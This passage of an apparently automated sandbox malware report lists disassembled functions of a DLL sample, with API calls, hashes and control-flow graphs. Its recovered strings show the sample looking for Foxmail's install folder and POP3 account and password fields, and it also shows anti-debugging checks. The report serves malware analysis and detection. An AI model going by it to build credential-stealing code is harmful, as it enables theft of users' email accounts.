                                                                                                  APIs
                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                  • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                  • String ID:
                                                                                                  • API String ID: 1083526818-0
                                                                                                  • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                  • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                  • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                  • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                                  Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                    • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                    • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                    • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                    • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                  • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                  • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                  • String ID: )$Foxmail$ProgramFiles
                                                                                                  • API String ID: 672098462-2938083778
                                                                                                  • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                  • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                  • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                  • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                                                                                  Function 1000C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                  • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                    • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                    • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                    • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2099061454-0
                                                                                                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                  • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                  • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                                  Function 1000C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 79 1000c7a7-1000c7bc 80 1000c82d 79->80 81 1000c7be-1000c7c6 79->81 83 1000c82f-1000c833 80->83 81->80 82 1000c7c8-1000c7f6 call 1000c7e6 81->82 91 1000c7f8 82->91 92 1000c86c-1000c86e 82->92 85 1000c872 call 1000c877 83->85 86 1000c835-1000c83d GetModuleHandleA 83->86 89 1000c83f-1000c847 86->89 89->89 90 1000c849-1000c84c 89->90 90->83 93 1000c84e-1000c850 90->93 94 1000c7fa-1000c7fe 91->94 95 1000c85b-1000c85e 91->95 96 1000c870 92->96 97 1000c866-1000c86b 92->97 98 1000c852-1000c854 93->98 99 1000c856-1000c85a 93->99 102 1000c865 94->102 103 1000c800-1000c80b GetProcAddress 94->103 100 1000c85f-1000c860 GetProcAddress 95->100 96->90 97->92 98->100 99->95 100->102 102->97 103->80 104 1000c80d-1000c81a VirtualProtect 103->104 105 1000c82c 104->105 106 1000c81c-1000c82a VirtualProtect 104->106 105->80 106->105
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                    • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                    • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                    • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                    • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2099061454-0
                                                                                                  • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                  • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                  • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                  • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                  Function 1000C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 107 1000c803-1000c80b GetProcAddress 108 1000c82d 107->108 109 1000c80d-1000c81a VirtualProtect 107->109 112 1000c82f-1000c833 108->112 110 1000c82c 109->110 111 1000c81c-1000c82a VirtualProtect 109->111 110->108 111->110 113 1000c872 call 1000c877 112->113 114 1000c835-1000c83d GetModuleHandleA 112->114 116 1000c83f-1000c847 114->116 116->116 117 1000c849-1000c84c 116->117 117->112 118 1000c84e-1000c850 117->118 119 1000c852-1000c854 118->119 120 1000c856-1000c85e 118->120 122 1000c85f-1000c865 GetProcAddress 119->122 120->122 124 1000c866-1000c86e 122->124 126 1000c870 124->126 126->117
                                                                                                  APIs
                                                                                                  • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                  • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                  • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                  • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 2152742572-0
                                                                                                  • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                  • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                  • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                  • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE

                                                                                                  Non-executed Functions

                                                                                                  Function 100060E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                  • String ID:
                                                                                                  • API String ID: 3906539128-0
                                                                                                  • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                  • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                  • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                  • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                  Function 10004AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                  • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                  • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                  • String ID:
                                                                                                  • API String ID: 1703294689-0
                                                                                                  • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                  • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                  • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                  • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                  Function 1000724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 54951025-0
                                                                                                  • Opcode ID: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                                                                  • Instruction ID: 1e6cba0042ebf2c12c09a4b69519b161692f08ba8376aa17aabccb2fe2e68a66
                                                                                                  • Opcode Fuzzy Hash: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                                                                  • Instruction Fuzzy Hash: 81A01130A002228FE3208F308A8A30E3AACAA002C0B00803AE80CC0028EB30C0028B00
                                                                                                  Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 136 1000173a-100017fe call 1000c030 call 10002c40 * 2 143 10001803 call 10001cca 136->143 144 10001808-1000180c 143->144 145 10001812-10001816 144->145 146 100019ad-100019b1 144->146 145->146 147 1000181c-10001837 call 10001ede 145->147 150 1000183d-10001845 147->150 151 1000199f-100019ac call 10001ee7 * 2 147->151 152 10001982-10001985 150->152 153 1000184b-1000184e 150->153 151->146 157 10001995-10001999 152->157 158 10001987 152->158 153->152 155 10001854-10001881 call 100044b0 * 2 call 10001db7 153->155 170 10001887-1000189f call 100044b0 call 10001db7 155->170 171 1000193d-10001943 155->171 157->150 157->151 159 1000198a-1000198d call 10002c40 158->159 165 10001992 159->165 165->157 170->171 187 100018a5-100018a8 170->187 172 10001945-10001947 171->172 173 1000197e-10001980 171->173 172->173 175 10001949-1000194b 172->175 173->159 177 10001961-1000197c call 100016aa 175->177 178 1000194d-1000194f 175->178 177->165 180 10001951-10001953 178->180 181 10001955-10001957 178->181 180->177 180->181 184 10001959-1000195b 181->184 185 1000195d-1000195f 181->185 184->177 184->185 185->173 185->177 188 100018c4-100018dc call 100044b0 call 10001db7 187->188 189 100018aa-100018c2 call 100044b0 call 10001db7 187->189 188->157 198 100018e2-1000193b call 100016aa call 100015da call 10002c40 * 2 188->198 189->188 189->198 198->157
                                                                                                  APIs
                                                                                                    • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                    • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                    • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                  • _strlen.LIBCMT ref: 10001855
                                                                                                  • _strlen.LIBCMT ref: 10001869
                                                                                                  • _strlen.LIBCMT ref: 1000188B
                                                                                                  • _strlen.LIBCMT ref: 100018AE
                                                                                                  • _strlen.LIBCMT ref: 100018C8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _strlen$File$CopyCreateDelete
                                                                                                  • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                  • API String ID: 3296212668-3023110444
                                                                                                  • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                  • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                  • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                  • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                  Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _strlen
                                                                                                  • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                  • API String ID: 4218353326-230879103
                                                                                                  • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                  • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                  • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                  • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                  Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 276 10007cc2-10007cd6 277 10007d44-10007d4c 276->277 278 10007cd8-10007cdd 276->278 280 10007d93-10007dab call 10007e35 277->280 281 10007d4e-10007d51 277->281 278->277 279 10007cdf-10007ce4 278->279 279->277 282 10007ce6-10007ce9 279->282 290 10007dae-10007db5 280->290 281->280 284 10007d53-10007d90 call 1000571e * 4 281->284 282->277 285 10007ceb-10007cf3 282->285 284->280 288 10007cf5-10007cf8 285->288 289 10007d0d-10007d15 285->289 288->289 292 10007cfa-10007d0c call 1000571e call 100090ba 288->292 295 10007d17-10007d1a 289->295 296 10007d2f-10007d43 call 1000571e * 2 289->296 293 10007dd4-10007dd8 290->293 294 10007db7-10007dbb 290->294 292->289 304 10007df0-10007dfc 293->304 305 10007dda-10007ddf 293->305 300 10007dd1 294->300 301 10007dbd-10007dc0 294->301 295->296 302 10007d1c-10007d2e call 1000571e call 100091b8 295->302 296->277 300->293 301->300 311 10007dc2-10007dd0 call 1000571e * 2 301->311 302->296 304->290 309 10007dfe-10007e0b call 1000571e 304->309 306 10007de1-10007de4 305->306 307 10007ded 305->307 306->307 314 10007de6-10007dec call 1000571e 306->314 307->304 311->300 314->307
                                                                                                  APIs
                                                                                                  • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                  • _free.LIBCMT ref: 10007CFB
                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                  • _free.LIBCMT ref: 10007D1D
                                                                                                  • _free.LIBCMT ref: 10007D32
                                                                                                  • _free.LIBCMT ref: 10007D3D
                                                                                                  • _free.LIBCMT ref: 10007D5F
                                                                                                  • _free.LIBCMT ref: 10007D72
                                                                                                  • _free.LIBCMT ref: 10007D80
                                                                                                  • _free.LIBCMT ref: 10007D8B
                                                                                                  • _free.LIBCMT ref: 10007DC3
                                                                                                  • _free.LIBCMT ref: 10007DCA
                                                                                                  • _free.LIBCMT ref: 10007DE7
                                                                                                  • _free.LIBCMT ref: 10007DFF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                  • String ID:
                                                                                                  • API String ID: 161543041-0
                                                                                                  • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                  • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                  • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                  • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                  Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 100059EA
                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                  • _free.LIBCMT ref: 100059F6
                                                                                                  • _free.LIBCMT ref: 10005A01
                                                                                                  • _free.LIBCMT ref: 10005A0C
                                                                                                  • _free.LIBCMT ref: 10005A17
                                                                                                  • _free.LIBCMT ref: 10005A22
                                                                                                  • _free.LIBCMT ref: 10005A2D
                                                                                                  • _free.LIBCMT ref: 10005A38
                                                                                                  • _free.LIBCMT ref: 10005A43
                                                                                                  • _free.LIBCMT ref: 10005A51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                  • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                  • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                  • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                  Function 10001CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
